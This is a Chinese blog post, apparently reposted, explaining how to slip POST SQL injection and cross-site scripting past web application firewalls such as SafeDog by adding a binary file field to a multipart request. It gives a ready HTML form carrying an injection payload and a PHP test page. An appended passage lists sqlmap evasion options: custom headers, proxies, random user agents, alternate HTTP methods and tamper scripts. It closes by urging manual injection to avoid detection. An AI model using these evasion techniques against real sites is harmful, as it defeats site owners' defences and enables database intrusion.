轻松绕各种WAF的POST注入、跨站防御(比如安全狗)

XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压缩包什么的都行。

构建如下HTML表单:

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>yzmm - p2j.cn</title>
</head>
<body>
<form action="http://webshell.cc/index.php" method="POST" enctype="multipart/form-data">
File:<input type="file" name="file" /><br/>
ID:<input type="text" name="id" value="select 1 from mysql.user--" style="width:250px;" / ><br/>
<input type="submit" value="提交" />
</form>
</body>
</html>

index.php:

 

<?php
echo "POST-ID:".$_POST['id']."<br/>GET-ID:".$_GET['id'];
?>

提交带二进制文件的请求:

成功绕过。

 

 

本站内容均为原创,转载请务必保留署名与链接!
轻松绕各种WAF的POST注入、跨站防御(比如安全狗):http://www.webshell.cc/4464.html

转载于:https://www.cnblogs.com/develop/p/3884872.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLMap是一款常用的SQL注入工具,但是在一些情况下,可能会被Web应用程序防火墙(WAF)检测到并且阻止进一步的注入攻击。下面是一些WAF的SQLMap注入技巧: 1. 修改HTTP头部 在SQLMap中使用`--headers`选项来修改HTTP头部,例如: ``` sqlmap -u "http://example.com?id=1" --headers="User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" ``` 这将向请求添加一个自定义的User-Agent头部,从而WAF的检测。 2. 使用代理 使用代理服务器时,WAF通常无法检测到SQL注入攻击,因为它只能检测来自客户端的请求。在SQLMap中使用`--proxy`选项来指定代理服务器,例如: ``` sqlmap -u "http://example.com?id=1" --proxy=http://127.0.0.1:8080 ``` 这将使用本地代理服务器进行注入攻击。 3. 使用多个随机User-Agent头部 使用多个随机的User-Agent头部可以使WAF难以检测到SQL注入攻击。在SQLMap中使用`--random-agent`选项来随机生成User-Agent头部,例如: ``` sqlmap -u "http://example.com?id=1" --random-agent ``` 这将在每个请求中使用随机生成的User-Agent头部。 4. 使用不同的HTTP方法 WAF通常只检测常见的HTTP方法,如GET和POST。在SQLMap中使用`--method`选项来指定不同的HTTP方法,例如: ``` sqlmap -u "http://example.com?id=1" --method=PUT ``` 这将使用PUT方法进行注入攻击,从而WAF的检测。 5. 使用Tamper脚本 Tamper脚本是SQLMap的一个功能,可以修改SQL注入的请求和响应。在SQLMap中使用`--tamper`选项来指定Tamper脚本,例如: ``` sqlmap -u "http://example.com?id=1" --tamper=space2comment ``` 这将使用space2comment Tamper脚本,将空格转换为注释,从而WAF的检测。 总之,以上这些技巧并不一定都能够成功WAF的检测,要根据具体情况选择合适的方法。同时,为了避免被WAF检测到,也可以使用其他工具或手动注入的方式来进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值